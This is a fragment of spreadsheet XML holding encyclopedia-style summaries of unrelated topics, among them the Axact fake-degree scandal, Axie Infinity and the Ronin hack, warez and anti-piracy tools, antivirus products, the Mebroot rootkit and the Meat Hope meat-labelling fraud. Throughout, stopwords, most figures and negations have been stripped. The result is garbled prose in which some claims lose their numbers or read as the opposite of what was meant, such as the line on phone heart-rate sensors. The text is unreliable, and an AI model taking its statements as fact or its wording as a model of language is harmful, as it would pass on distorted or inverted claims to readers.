    <t>axact (urdu: ایگزیکٹ) pakistan software company runs numerous websites selling fraudulent academic degrees. company also owns media company network. history axact founded shoaib ahmed shaikh, serves chairman. based karachi, 2,000 employees. according shaikh, company founded 1997 fewer employees working single room. 2013 said axact world's leading company eight broad-business units products, 5,200 employees, associated globally many million customers worldwide. company website said 2015 company diverse business units offer products, billion users, global presence across continents, countries 1,300 cities 25,000 employees associates.according securities exchange commission pakistan records, company registered june 2006 paid capital million (us$58,860) 2010. government records show paid income approximately 18,90,000 (us$18,543) year 2014, shaikh paid personal income (us$0.26) year.in september 2018, shoaib shaikh, owner arrested sentenced years scam along staff members. fake diplomas scandal york times investigation 2015, york times published investigative story reporting axact least degree accreditation mill websites. report said although company sell software, chiefly website design smartphone applications, main business take centuries-old scam selling fake academic degrees turn internet-era scheme global scale." times reported company around 2,000 employees, pretended american educational officials worked shifts keep company open hours day. company response axact denied allegations. company accused york times "baseless, substandard reporting" part plot rival news organizations stop network, scheduled start operations soon. also threatened several news organizations bloggers reporting issue lawsuits.initially shaikh denied association fake educational websites besides selling software. later said axact provide office support call center services websites, "issue degree diploma, whether fake real." official investigations following publication york times article, pakistan's interior minister chaudhry nisar khan directed country's federal investigation agency begin inquiry whether company involved illegal business. following interior minister's order, cyber crime team raided axact's offices karachi islamabad seized computers, recorded statements employees took custody employees company employees rawalpindi office. team found seized several blank degrees well fake letterhead state department. investigation transferred fia's cyber crime department corporate department.the issue also taken senate pakistan chairman senate raza rabbani constituted committee probe issue. pakistan's authorities secp also initiated investigations company.new details released april 2016 report state scandal “bigger initially imagined." alleged axact took money 215,000 people countries; shoaib shaikh owner several shell companies caribbean countries used route monies pakistan; shaikh used alias documentation linked offshore companies; shaikh became citizen saint kitts nevis, small caribbean island nation sells passports rich investors; axact sales agents' employees used "threats false promises" impersonated government officials take money customers generally middle east; company earned least us$89 million final year operation.axact shoaib shaikh acquitted money laundering charges august 2016 lack evidence. criminal charges concerning alleged fake degrees concluded 2018. during investigations, pakistan chief justice called scam national shame. sessions court pakistan july 2018 convicted shoaib sheikh others case sentenced years prison. judge also imposed fine rs1.3 million convicts.in 2016, umair hamid, axact's assistant vice president international relations arrested charged criminal complaint filed federal court manhattan wire fraud, conspiracy commit wire fraud aggravated identity theft axact-related activities. hamid found guilty august 2017 sentenced months prison. further revelations most axact's revenues fake diploma sales came united arab emirates, hundreds residents used axact diplomas obtain high-paying jobs. axact sold 200,000 fake degrees gulf countries. more recently, axact employees impersonated emirati government officials effort extort "legalisation fees" unsuspecting fake degree diploma holders country.the canadian broadcasting corporation's television series marketplace carried investigation prevalence fake academic credentials. september 2017 documentary focused canadians fake degrees occupying positions college instructors medical doctors. suspect certificates found axact. network websites york times investigation identified websites associated axact's alleged fake diploma operations, including sites fictitious universities, high schools, fake accreditation boards, degree portals. following incomplete list websites: educational websites accreditation websites references external links official website</t>
  </si>
  <si>
    <t>Axie Infinity</t>
  </si>
  <si>
    <t>axie infinity non-fungible token-based online video game developed vietnamese studio mavis, known in-game economy uses ethereum-based cryptocurrencies.players axie infinity collect mint nfts represent axolotl-inspired digital pets known axies. these creatures bred battled within game. mavis charges 4.25% players trade axies marketplace.as september 2021, axie infinity players philippines. they low-wage workers "bosses" rent axies grind game bosses' behalf. this arrangement described "digital colonialism".axie infinity built ronin network, ethereum-linked sidechain developed mavis. game's associated token, slp, crashed february 2022 amid wider cryptocurrency crash, losing peak value. march 2022, hackers compromised ronin network, stealing approximately us$620 million worth cryptocurrency project. hackers linked lazarus group, funded north korea. gameplay according company's website, axie infinity competitive game "idle battle" system derived games like final fantasy tactics idle heroes. game's setting filled creatures called axies players collect pets. players battle, breed, collect, raise, build kingdoms axies. game in-game economy players buy, sell, trade resources earn game.sky mavis marketed game "play-to-earn" model (also called "pay-to-play-to-earn" model) participants starting costs, earn ethereum-based in-game cryptocurrency playing. axie infinity allows users cash-out tokens every fourteen days. this model described form gambling, unstable market overly reliant inflow players.in february 2020, mavis estimated player would need spend around us$400 meet starting requirement. august 2020, cheapest axie cost approximately us$307, although reports march 2022 suggest floor price axie dipped around us$20.in philippines, prohibitive cost entry formation gaming guilds rented assets allow players meet minimum requirements. june 2021, people philippines begun treat game main source income, although earning rates playing axie infinity fell national minimum wage september 2021. philippine department finance also clarified income playing axie infinity taxable, suggested classify cryptocurrency currency security.players axie infinity also purchase virtual land in-game assets nfts. record sale plot virtual land priced us$2.3 million, november 2021. gameplay related purchased virtual land intended introduced 2020, pushed back twice april 2022. delays prompted complaints users coinciding sharp decline profitability in-game economy. development history development axie infinity commenced 2017, co-founder ceo, nguyen thanh trung, alongside doan, aleksander larsen, jeffrey zirlin, andy nguyen previously spent money game cryptokitties began work blockchain-based game, combining elements cryptokitties gameplay pokémon series neopets.in october 2018, development team released axie infinity's first battle system. development real-time card battle system application commenced march 2019, alpha released december 2019.sky mavis launched ronin wallet february 2021, addition speeding transactions eliminating expensive fees gamers offers opportunity play axie infinity dapp ronin sidechain.the value game's associated token, smooth love potion (slp), crashed february 2022 amid wider cryptocurrency crash, losing peak value. mavis attempted stabilize price introducing features game, attempts ineffective. exchange value caused massive exodus players, leaving guild leaders without cheap third-world labor force grind behalf. mavis removed references "play-to-earn" websites marketing tokens plummeted value.on march 2022, hackers compromised ronin network, stealing approximately us$620 million ether usdc. hack currently sits largest-ever breach cryptocurrency sector dollar value. hack damaged value slp.on april 2022, mavis said expected would able recover funds, would take several years. april 2022, issued statement lazarus group apt38, north korean state-sponsored hacker groups, responsible theft. accordingly, treasury sanctioned cryptocurrency address. some cryptocurrency laundered cryptocurrency tumbler known "tornado cash". also blockchain blockchain game decentralized application non-fungible token references further reading d'anastasio, cecilia; volpicelli, gian november 2021). "the escapist fantasy games capitalism". wired. retrieved december 2021.</t>
  </si>
  <si>
    <t>List of compact discs sold with MediaMax CD-3</t>
  </si>
  <si>
    <t>following compact discs sold software package copy-protection known mediamax cd-3, created sunncomm used record label records/arista records/bmg. also list compact discs sold extended copy protection sony copy protection rootkit scandal references</t>
  </si>
  <si>
    <t>Pirate Pay</t>
  </si>
  <si>
    <t>pirate software toolset used copy protection content management torrents, authors publishers. pirate operates japanese, russian indian markets. eighty-five percent pirate clients come outside russia. pirate technology blocks approximately million illegal downloads month, processing 1500 torrent-seeds. according dasreda, translates around million savings copyright holders. pirate widely used around world. history pirate first presented second start-up tour city perm april 2010-2011. founders brothers andrei alexei klimenko, along friend dmitry shuvaev, established limited liability company called "internet content." initial investment $34,000 furnished brothers, retain ownership firm. 2010 pirate participated three competitions: finalists 2010. "best business model" competition technology start-ups organized crfd fund. grant competition "higher school economics". 2011 march 2011, company first competition projects organized microsoft received seed funding foundation, grant $100,000. april 2011, company's application passed competitive selection process s.t.a.r.t. program. company signed $34,000 government contract foundation assistance small innovative enterprises science technology (bortnik fund). 2011, pirate became finalists herring europe. this group companies organization innovative pool hundreds across europe. evaluated quantitative qualitative criteria, financial performance, technology innovation, quality management, execution strategy integration respective industries. december 2011, first experiment "alpha" version service including film: vysotsky. thanks god, alive. 2012 company received skolkovo resident status received grant $1.2 million. pirate established partnership japanese company unidam. 2013 spring 2013, pirate received $68,000 program “start-2”. technical details pirate works info-hashes content worldwide peer-to-peer network. remove links deals without interaction torrent sites, link aggregators search engines. protection content illegal distribution started title. thousands code strings operate without human intervention detect required title name file sharing swarms. directly placed protection executes necessary actions prevent content downloading leeches uploading seeders. pirate operates technology first uploader search swarm, finding first infringer offline legal activities. other products zillion data fair play references external links official website</t>
  </si>
  <si>
    <t>PirateBrowser</t>
  </si>
  <si>
    <t>piratebrowser internet browser pirate used circumvent internet censorship. piratebrowser piratebrowser released august 2013 tenth anniversary pirate bay.| bundle firefox portable foxyproxy addon firefox, vidalia client proxy configurations speed page loading. according torrentfreak downloaded 100,000 times first three days, 1,000,000 times october 2013, 2,500,000 times january 2014, 5,000,000 times 2014. "it's providing anonymity secure hide identity. piratebrowser supposed circumvent censoring website blocking. made browser fully anonymous would slow browsing" piratebrowser.com suspended around 2015-12-07, released piratebrowser0.6b piratebrowser1.0bthe browser circumvents site-blocking countries including, according pirate site, belgium, denmark, finland, iran, ireland, italy, netherlands, north korea united kingdom. this allows users access websites otherwise blocked, usually government threat legal action, internet service providers (isps) countries. "the goal create browser-like client circumvent censorship, including domain blocking, domain confiscation, ip-blocking. this accomplished sharing site’s indexed data downloadable packages, browsed/rendered locally" team-lil's pirate browser team-lil's pirate browser mentions similar features. further reading muchmore, michael (august 2013). "piratebrowser review". magazine. antonovich, chris; hatalsky, olivia hatalsky march 2014). piratebrowser artifacts (pdf). burlington vermont: senator patrick leahy center digital investigations. references external links team-lil pirate browser (9.0.9) techspot</t>
  </si>
  <si>
    <t>Pirates with Attitudes</t>
  </si>
  <si>
    <t>pirates with attitudes (pwa) major international warez release group 1992 2000. group established former international network crackers members known pseudonyms orion barmanager. also well known tail bbs-era development modifications enhancements ("mods") pcboard software. 2000, united states department justice released press report stating conspiracy copyright infringement charges brought several members electronic theft act). doj's report, released .nfo file officially announcing retirement. first groups ever prosecuted law. members alleged members pirates attitudes according u.s. department justice: robin rothberg, "marlenus," (9/11/67) newburyport, massachusetts (pleaded guilty) mark veerboken, "shiffie," belgium steven ahnen, "code3," (4/13/58) sarasota, florida (pleaded guilty) christian morley, "mercy" (4/13/73) salem, massachusetts (convicted) justin robbins, "warlock," (2/10/76), lake station, indiana (pleaded guilty) jason slater, "technic," (4/28/70) sunnyvale, california (pleaded guilty) todd veillette, "gizmo," (11/21/59) oakdale, connecticut (pleaded guilty) thomas oliver, "rambone," (7/14/65) aurora, illinois (pleaded guilty) mark stone, "stoned," (3/24/66) california (pleaded guilty) dionne, "akasha", west palm beach, florida (pleaded guilty) chowdery, real name unknown james tinner, inspector gadget, spokane references u.s. indicts alleged international software piracy conspiracy- archive website posting o'reagan, patrick snyder, cecily anne (february 2004). requirement jury instructions fair pirates attitudes' cracking software making available internet". journal internet law. (8): 22–24. issn 1094-2904. "pirates attitude (pwa) group organized dedicated making copyrighted software available internet." mccandless, david (1997-04-05). "warez wars". wired. retrieved 2012-06-16. goldman, eric (2004-04-09). "warez trading criminal copyright infringement, part "first guilty verdict internet piracy law". 2001-05-06. indicted alleged software theft scam". 2000-05-05. archived original 2012-03-02. retrieved 2012-06-16. f.3d 666: united states america, plaintiff-appellee, jason slater christian morley, defendants-appellants newton, michael (2003). encyclopedia high-tech crime crime-fighting. infobase publishing. isbn 1438129866.</t>
  </si>
  <si>
    <t>List of computer worms</t>
  </si>
  <si>
    <t>also timeline notable computer viruses worms comparison computer viruses list trojan horses references</t>
  </si>
  <si>
    <t>PlagScan</t>
  </si>
  <si>
    <t>plagscan plagiarism detection software, mostly used academic institutions. plagscan compares submissions documents, journals internal archives. software launched 2009 markus goldbach johannes knabe. functionality plagscan offered software service on-premise solution. users either register single user organization. upon first-time registration, single users receive free test credit purchase additional credits future submissions, completion satisfactory trial. organizational users verify organization's address prior using software. obligation-free quote requested immediately website. organizations choose variety options create multiple administrators groups, example, divide different departments within institution. after scanning submission plagiarism, plagscan provides users detailed report indicates potential plagiarism lists matched sources. markets plagscan serves schools universities worldwide. software aims help academic institutions increase students’ awareness toward plagiarism academic integrity. plagscan also offers services commercial market publishers. business users employ software improve rankings secure proper usage copyright material. they mostly ensure unique content protection. common commercial customers publishers, journalists, advertising agencies firms. 2018, plagscan served 1,500,000 single users 1,500 organizations university zürich, university jordan, auburn university ministry education (austria). annually, plagscan checks several million documents plagiarism. privacy data security plagscan compliant european general data protection regulation gdpr, particularly following german bundesdatenschutzgesetz (bdsg), data security copyright regulations. each user variety options regarding data submission settings, example, whether keep, delete include submissions internal archive. according european data security privacy laws. technology plagscan's two-step algorithm developed 2008 compares submissions millions sources internal archives users optionally participate software recognizes plagiarism soon least three consecutive words match different source. plagscan built indexing tool based apache solr relies microsoft bing’s search index documents.the software integrated learning management systems moodle, canvas, schoology, integration. reviews plagiarism blog plagiarismtoday.com ranked plagscan fourth-best plagiarism detection software market 2011.plagscan participated "captivate", three-month acceleration program german accelerator 2014, promoting german technology startups enter u.s. market.plagscan ranked best information communication technologies european venture summit 2014. spotlight spanish media, congress senate plagscan came spotlight spain september 2018 created social debate, even discussed spanish congress deputies senate, spanish government used check alleged plagiarism spanish president pedro sanchez's doctoral thesis. program allegedly reported 0.96% match spanish government, however figures later corrected plagscan ceo, markus goldbach default configuration. rival software turnitin reported rate plagiarism 15%, several times reported spanish government using plagscan. company replied "after applying software internally using default settings filters plagscan cannot confirm number. initial scan revealed percent duplicated content. order receive 0.96 percent result, must applied specific settings actively disqualified sources. plagscan reached moncloa order gain insight government’s procedure methodology."this ongoing controversy different newspapers, depending political bias, defend result other. also plagiarism comparison anti-plagiarism software references</t>
  </si>
  <si>
    <t>Azumio</t>
  </si>
  <si>
    <t>azumio mobile health company specializes biometric mobile technology. founded 2011, azumio develops apple android health apps services. azumio released apps ios, apps android, apps windows phone. company headquartered palo alto, california. overview azumio publishes biometric health applications services mobile devices. company's goals directed toward improvement wellness motivating healthy behavior mobile applications. within apps, users explore personal data trends stay motivated community support. azumio works clinical research scientists stanford university university california, francisco.in july 2012 azumio acquired skyhealth. apps argus argus azumio's largest application, launched july 2013. with integrating various aspects health single user timeline, argus designed integrate data instant heart rate, sleep time, fitness buddy, instant fitness single location. argus allows users input track personal elements daily lives nutrition exercise. lifetracker, functions pedometer, calorie counter, nutrition tracker, activity logger. argus provides goal tracking functionalities customizable data trend charts allow users compare various attributes lifestyle interact another. data 720,000 argus users used large-scale study physical activity countries. social december 2013, argus introduced health-based social network users friends followers. after completing activity logging health record, users able privately publicly share event. april 2014, social feature expanded news feed compiles shared events friends. discover section added allows users explore social network friends followers similar interests. february 2019, wall street journal reported health-oriented owned azumio, "instant heart rate: monitor," sends user's private health data social media giant facebook immediately recorded. this occurs even user facebook account. fitness buddy fitness buddy azumio's first fitness application, launched july 2011. through built-in training programs, step-by-step videos, audio instruction cues, motivational guidance, aims serve mobile fitness coach. fitness buddy contains exercise library 1700 exercises, instructional videos, animated workout photos, custom workout builder. fitness buddy supports iphone, ipad, android, windows phone platforms, also features sonicast allows users wirelessly share workouts instant heart rate instant heart rate, released october 2010, mobile heart rate monitor app. with advancements mobile phone camera resolution, smart phones accurately measure heart rate analyzing minute color changes skin. application, illuminates user's finger phone's flashlight feature uses phone's camera analyze color changes finger track heart rate. smart phone's sensors reliable traditional methods measurement. insight reports october 2014, instant heart rate introduced insight reports. when generated, insight reports aggregate heart rate measurements one-month period. users heart rate measurements sorted time day, category (after waking exercise, etc.), also visualizations pulse waveforms sleep time azumio released smart alarm clock sleep analysis tool, sleep time, march 2012. using accelerometer mobile phones, application uses movement-analysis algorithms measure user's level body movement correlates specific phase sleep cycle (light sleep deep sleep). recognizing user light phase sleep, sleep time alarms incrementally time period allow gradual wakeup. users choose built soundscapes, environmental background sounds, play personal music fall asleep. after sleep session, sleep time generates graph allows user track amounts light deep sleep, sleep duration, sleep efficiency. sleep time provides syncing capabilities apple health application. glucose buddy azumio released glucose buddy october 2011 digitizing paper-and-pen logging systems diabetics. users manually enter glucose numbers, carbohydrate consumption, insulin dosages, activities glucose buddy. this data synced onto user's account, allowing access multiple devices including desktop portal. glucose buddy plots data graphs exported emailed user's physician. instant fitness instant fitness application azumio's integration fitness buddy's exercise database mobile personal trainer creates bodyweight workouts users. since release late december 2012, instant fitness added smart workout generator. instant fitness contains exercises leads users workouts voice cues step-by-step animations. workout database includes cardiovascular workouts, equipment-specific routines, sports-based conditioning workouts. application logs user's workout repetitions data calendar. references external links www.azumio.com</t>
  </si>
  <si>
    <t>Avira</t>
  </si>
  <si>
    <t>avira operations gmbh german multinational computer security software company mainly known antivirus software avira free security (formerly known avira free antivirus avira antivir). avira founded 2006, antivirus application active development since 1986, predecessor company h+bedv datentechnik gmbh. 2021, avira owned american software company nortonlifelock, previously owned investment firm investcorp. company also offices united states, china, romania, japan. technology virus definition avira periodically "cleans out" virus definition files, replacing specific signatures generic ones general increase performance scanning speed. database clean-out made october 2008, causing problems users free edition large size avira's slow free edition servers. avira responded reducing size individual update files, delivering less data update. nowadays smaller definition files updated regularly order avoid peaks download updates.its file-by-file scanning feature jokingly titled "luke filewalker" developers, reference star wars media franchise character "luke skywalker". advance heuristic avira products contain heuristics proactively uncover unknown malware, special virus signature combat damaging element created virus guard update sent. heuristic virus detection involves extensive analysis investigation affected codes functions typical malware. code scanned exhibits characteristic features reported suspicious, although necessarily malware; user decides whether ignore warning. proactiv proactiv component uses rule sets developed avira malware research center identify suspicious behavior. rule sets supplied avira databases. proactiv sends information suspicious programs avira databases logging. firewall avira removed firewall technology 2014 onwards, protection supplied instead windows firewall (windows after), windows later microsoft certification program, forces developers interfaces introduced windows vista. protection cloud avira protection cloud (apc) first introduced version 2013. uses information available internet (cloud computing) improve detection affect system performance less. this technology implemented paid 2013 products. initially used manual quick system scan; later extended real-time protection. partners avira offers antivirus engine form software development implement complementary products. strategic technology partners avira include canonical, cyan networks, ibm, intelligence microsoft, novell, opswat, synergy systems others. september 2014, avira announced partnership dropbox, combine avira's security dropbox's "sync share" capabilities.tjark auerbach, founder avira sold almost 100% stakes company investcorp group manama (bahrain) april 2020. stakes reportedly sold price million dollars. investcorp group invested several firms cybersecurity sector past. directors investcorp group belong several royal families middle east countries like kuwait, bahrain, saudi arabia, etc. however, total ordinary preferred shares owned dhabi-based mubadala group since 2017. also serves headquarter cybersecurity firm discredited involvement human rights abuses activists, dissidents arrested criticizing monarchy; conducting cyber offensives fifa officials, ruler qatar; surveillance jamal khashoggi. chairman mubadala group owns institute called ecssr emirates center strategic studies research, allegedly influenced german academics gain soft-power impact policies conflict interest uae.on december 2020, nortonlifelock announced acquisition avira approximately us$360 million investcorp technology partners. acquisition closed january 2021.in february 2021, bullguard joined avira part nortonlifelock. products windows avira offers following security products tools microsoft windows: avira free antivirus: free edition antivirus/anti-spyware, non-commercial use, promotional pop-ups. avira antivirus pro: premium edition antivirus/anti-spyware. avira system speedup free: free suite tune-up tools. avira system speedup pro: premium edition suite tune-up tools. avira internet security suite: consists antivirus system speedup firewall manager. avira ultimate protection suite: consists internet security suite additional maintenance tools (e.g. supereasy driver updater). avira rescue system: free tools include utility used write linux-based bootable used clean unbootable also able find malware hides host's operating system active (e.g., rootkits). tool contains antivirus program virus database current time download. boots machine antivirus program, scans removes malware, restores normal boot operation necessary. avira free security mac: runs 10.9 above. android avira offers following security applications mobile devices running android ios: avira antivirus security android: free application android, runs versions above. avira antivirus security android: premium edition android, runs versions above. available upgrade within free application.it provide additional safe browsing, hourly update free tech support.avira mobile security free edition devices, iphone ipad. other products avira phantom vpn: avira's virtual private network software android, ios, macos windows. avira prime: april 2017 avira launched single-user, multi-device subscription-based product designed provide complete avira products available duration license along premium support.avira prime compatible windows, osx, ios, android operating systems related devices available consumers 25-device editions, dubbed "avira prime" "avira prime unlimited" respectively. subscriptions 30-day 1-year increments. discontinued platforms avira formerly offered free antivirus software unix linux. that discontinued 2013, although updates supplied june 2016. security vulnerabilities 2005, avira archive buffer overflow vulnerability. remote attacker could exploited vulnerability crafting archive delivering malicious page e-mail. buffer overflow could occur avira scanned malicious archive. that would allowed attacker execute arbitrary code affected system.in 2010, avira management console use-after-free remote code execution vulnerability. vulnerability allowed remote attackers execute arbitrary code vulnerable installations avira management console. authentication required exploit vulnerability.in 2013, avira engines 0-day vulnerability allowed attackers access customer's found avipbb.sys driver file allowed privilege escalation. awards reviews january 2008, anti-malware test gave avira "gold" status proactive virus detection detection/removal rootkits.av-comparatives awarded avira product year" award "summary report 2008."in april 2009, awarded avira premium security suite maximum stars place a-list internet security software.in august 2009, avira performed 98.9% percent overall malware detection rate, fastest on-demand scans on-access scans conducted world magazine, ranked first website. avira among first companies receive oesis gold certification, indicating antispyware antivirus components several security products achieved maximum compatibility score widespread network technologies ssl/tls network access control companies including juniper networks, cisco systems, sonicwall. february 2010, testing firm av-test, avira tied first place (with another german company) "malware demand" detection test earned score "adware/spyware demand" test.av-comparatives gave avira silver award (for 99.5% detection rate) "summary report 2010."for 2012, av-comparatives awarded avira "gold" status 99.6% performance "on-demand malware detection" category classified avira "top rated" product overall year.in av-comparatives august 2014 "real-world protection test," total test cases tried various security products, avira tied first place.av-comparatives awarded avira product year" award "summary report 2016." also comparison antivirus software comparison firewalls comparison virtual private network services references external links official website auerbach stiftung (foundation)</t>
  </si>
  <si>
    <t>McAfee VirusScan</t>
  </si>
  <si>
    <t>mcafee virusscan antivirus software created maintained mcafee (formerly known intel security, network associates prior that). originally marketed standalone product, bundled mcafee livesafe, mcafee antivirus plus, mcafee total protection mcafee gamer security since 2010. mcafee livesafe integrates antivirus, firewall anti-spyware/anti-ransomware capabilities. 2006, british telecom company bskyb started offering broadband customers branded version virusscan free upon broadband modem installation. virusscan enterprise mcafee also produces enterprise-level product named virusscan enterprise: mcafee designed larger networks designed make management antivirus software multiple computers easier. unlike home-user edition, enterprise edition consists client application networked computers, server application, system installs updates configures settings client programs. clients controlled using included epolicy orchestrator (epo), unified console control virusscan mcafee products. september 2020, mcafee announced support date: december 2021 virusscan november 2008 mcafee announced virusscan (earlier versions used name virex, developed software.) changes virusscan included leopard compatibility, universal binary package intel powerpc-based macs, access scanning apple mail support. controversies poor independent test results tests virus bulletin additional independent consumer-organizations, mcafee virusscan fared well, frequently failing detect common viruses.a review virusscan 2006 cnet criticized product "pronounced performance hits three real-world performance tests" users reviewing product reported encountering technical problems.some older versions virusscan engine available cycles.as 2009, mcafee virus-scanning products handle false positives well, repeatedly removing quarantining known clean files, even user restoration files. customer support criticisms reviewers described customer support mcafee products lacking, support staff slow respond unable answer many questions. 2010 reboot problem april 2010, beginning approximately gmt, erroneous virus definition file update mcafee affected millions computers worldwide running windows service pack update resulted removal windows system file (svchost.exe) machines, causing machines lose network access and, cases, enter reboot loop. mcafee rectified removing replacing faulty file, version 5958, emergency file (version 5959) posted affected machines consumer "knowledgebase". 2012 update issues august 2012 update mcafee antivirus caused protection become turned users lose internet connections. mcafee criticized notifying users promptly issues learned current standing mcafee, though well-known, continues mixed reviews industry sources, company prepared 2015 release series address current market conditions. this repositioning includes voice facial recognition authentication cloud-based data security. also comparison antivirus software comparison firewalls internet security references external links virusscan windows, mcafee virusscan mac, mcafee tabular comparison, comparison between livesafe total protection versions mcafee</t>
  </si>
  <si>
    <t>Local Security Authority Subsystem Service</t>
  </si>
  <si>
    <t>local security authority server service (lsass) process microsoft windows operating systems responsible enforcing security policy system. verifies users logging windows computer server, handles password changes, creates access tokens. also writes windows security log. forcible termination lsass.exe result system losing access account, including authority, prompting restart machine. because lsass.exe crucial system file, name often faked malware. lsass.exe file used windows located directory %windir%\system32 description file local security authority process. running location, lsass.exe likely virus, spyware, trojan worm. systems display fonts, malicious developers name file something like isass.exe (capital instead lowercase "l") efforts trick users installing executing malicious file instead trusted system file. sasser (computer worm) spreads exploiting buffer overflow lsass windows windows 2000 operating systems. references external links security subsystem architecture authentication identity management</t>
  </si>
  <si>
    <t>Autopsy (software)</t>
  </si>
  <si>
    <t>autopsy computer software makes simpler deploy many open source programs plugins used sleuth kit. graphical user interface displays results forensic search underlying volume making easier investigators flag pertinent sections data. tool largely maintained basis technology corp. assistance programmers community. company sells support services training using product.the tool designed principles mind: extensible user able functionality creating plugins analyze part underlying data source. centralised tool must offer standard consistent mechanism accessing features modules. ease autopsy browser must offer wizards historical tools make easier users repeat steps without excessive reconfiguration. multiple users tool usable investigator coordinate work team.the core browser extended adding modules help scan files (called "ingesting"), browse results (called "viewing") summarize results (called "reporting"). collection open-source modules allow customization. process autopsy analyzes major file systems (ntfs, fat, exfat, hfs+, ext2/ext3/ext4, yaffs2) hashing files, unpacking standard archives (zip, etc.), extracting exif values putting keywords index. some file types like standard email formats contact files also parsed cataloged. users search indexed files recent activity create report html summarizing important recent activity. time short, users activate triage features rules analyze important files first. autopsy save partial image files format. correlation investigators working multiple machines file systems build central repository data allowing flag phone numbers, email addresses, file pertinent data might found multiple places. lite postgresql data base stores information investigators find occurrences names, domains, phone numbers registry entries. language version autopsy written perl runs major platforms including linux, unix, macos, windows. relies upon sleuth analyze disk. version released 2.0.autopsy written java using netbeans platform. released apache license 2.0.autopsy runs windows, linux, macos. autopsy depends number libraries various licenses. works lite postgresql data bases store information. indices searching keywords built lucene solr. references external links autopsy official website sleuth official website</t>
  </si>
  <si>
    <t>Mebroot</t>
  </si>
  <si>
    <t>mebroot master boot record based rootkit used botnets including torpig. sophisticated trojan horse uses stealth techniques hide user. trojan opens back door victim's computer allows attacker complete control computer. payload trojan infects allow start even operating system starts. this allows bypass safeguards embed deep within operating system. known trojan intercept read/write operations, embed deep within network drivers. this allows ability bypass firewalls communicate securely, using custom encrypted tunnel, command control server. this allows attacker install malware, viruses, applications. trojan commonly steals information victim's computer, attempt small financial gain. mebroot linked anserin, another trojan logs keystrokes steals banking information. this gives evidence showing financial motive likely behind mebroot. detection/removal trojan tries avoid detection hooking atapi.sys. also embeds ntoskrnl.exe. mebroot executable files, registry keys, driver modules, makes harder detect without antivirus software. addition running antivirus software, also remove trojan wiping repairing master boot record, hard drive, operating system. distribution three variants mebroot discovered. estimated first version compiled november 2007. december, mebroot started drive-by downloads. early 2008, second wave attacks arrived. february 2008 second variant discovered accompanied modified installer. march 2008 third variant discovered, attacks became widespread. since third variant, trojan upgraded outwit antivirus software. unknown mebroot still wild. mebroot currently known distributed visiting malicious websites, application exploit. estimated 1,500 websites compromised, mostly european region. traffic websites infected mebroot reach 50,000 100,000 views day. references external links rootkit, breed malware f-secure weblog, march 2008 stealth rootkit gmer, january 2008 trojan.mebroot technical details symantec from gromozon mebroot reflection rootkits today wayback machine (archived october 2013)</t>
  </si>
  <si>
    <t>Meat Hope</t>
  </si>
  <si>
    <t>meat hope inc. meat processing wholesaling company headquartered tomakomai, hokkaido, japan. went bankrupt 2007 several scandals fraudulently labeling foodstuffs, including ground beef fraud scandal. fraud came light former executive felt called upon become whistleblower. this opening japan's consumer affairs agency september 2009, month ahead schedule. summary meat hope established 1976 minoru tanaka. when tanaka, originally worked different meat provider, founded company, originally focused production supplying meat products. during heyday hokkaido's food processing wholesale industry, meat hope number sales. january 2006, employees employees including associated companies. after graduating junior high school, tanaka worked corporate ladder. helped expand business grow company. with tanaka president supported sons executives presidents associated companies, company typical family business (see also #associated companies). also, april 2006, year ground beef fraud scandal, tanaka awarded minister education, culture, sports, science technology commendation innovation later returned commendation). awarded development processor could uniformly meat ground beef." however, getting commendation fraud conducted, meat hope received order stop manufacturing char gone legally designated limit food additives allowed meat. tanaka research meat within company said "genius" knew meat. however, reality order bring costs called "product development", would food additives along inexpensive products innards, discarded meats. plan make ground meat look good artificial means (more details next section). june 2007, scandal fraudulent labeling quality hope meat's ground beef began. with many instances mislabeling food coming light, became impossible continue company operations. then july year, meat hope applied personal bankruptcy. day, decided commence bankruptcy proceedings. their total debt 670,000,000 yen. meeting hope meat's creditors held november year. however, among meat hope's client companies, company experienced loss adding tens millions yen. recovery hope meat's debt hopeless. august 2008, lack expenses, company closed bankruptcy, i.e., ceased exist legal entity. head office building also remained sale. however, since buyers found, demolished longer exists. minoru tanaka arrested prosecuted. then march 2008, sentenced prison years sapporo district court violation unfair competition prevention law. tanaka said wanted atone crimes, accept courts verdict seek appeal sapporo high court. meat fraud scandal ground beef fraud scandal reason meat hope's meat fraud whistleblowing complaint scandal coming light company's managing director, kiroku akahane. continuous coverage meat hope scandal akahane's whistleblowing "hoppo journal", akahane stated, want things co-conspirator."mr. akahane born 1935 nagano prefecture. after graduating nagano prefecture's kamiina agricultural high school, worked iida branch office ministry justice's legal affairs bureau. then joined sankyo seiki manufacturing (currently known nidec sankyo corporation) main office shimosuwa, suwa district, nagano prefecture. charge sales department sankyo shoji, associated company sankyo seiki manufacturing later merged nidec sankyo). after became managing director sanwa industries, ltd. 1978, akahane hired managing director noboribetsu prince hotel, part noguchi-kanko group hotel chain. would also work general manager tomakomai prince hotel muroran prince hotel (unrelated prince hotels seibu group). 1995, retiring akahane hired minoru tanaka (president meat hope) akahane's experience managing local tourist destinations. before retirement 2006, managing director. after joining meat hope, akahane made many connections made business executive expand markets honshu. bring factory, late realize ongoing food fraud. once knew actually occurring company, went tanaka (the company's president) attempt situation. however, tanaka heed akahane's warnings. moreover, since company tanaka's family, akahane felt difficult reform company within. order things, akahane hoped improve company administrative guidance. anonymously filed complaints various administrative bodies, tomakomai's health center, city's school lunch center, ministry agriculture, forestry fisheries (maff), hokkaido district agriculture office, etc. akahane claimed suffering mentally tanaka's management policies handling food fraud complaints. akahane stated 2000 years joining company) began taking sleeping pills anti-depressants. 2002, local newspaper reported complaint food fraud made former factory manager. however, name location company reported. investigations inquires made government organizations.in april 2006, akahane resigned meat hope. after revealing identity, brought sample fraudulently labeled ground beef maff's hokkaido district agriculture office requested investigation. however, hokkaido office refused accept sample meat hope's leaders nothing. maff later stated, "while documents confirm akahane's visit hokkaido office, nothing confirms brought meat testing." maff later stated, "because recognize company within hokkaido, requesting hokkaido government take action march 24." however, hokkaido government's department environment living replied, "there records." unclear held responsibility, maff hokkaido government. however, since meat hope opened tokyo office 2006, jurisdiction said fall maff. later, several people leadership ranks meat hope resigned. like akahane, started complaining news media. however, ignored hokkaido shimbun nhk.in spring 2007, asahi shimbun started investigation receiving complaint. results test frozen beef korokke detected pork, chicken types meat, proving meat fraud. based investigation, asahi shimbun reported detection pork found "co-op beef korokkes" produced hokkaido katokichi consolidated subsidiary katokichi, known tablemark co.,ltd.) june year. katokichi's investigation reported mistake handling ingredients hokkaido katokichi, person charge meat hope stated meat hope "mixed pork beef paid for" hokkaido katokichi.at meat hope press conference, company president emphasized meat fraud "accident" done "intentionally." however, urging eldest company director, appeared admitted personally participating meat fraud. time, 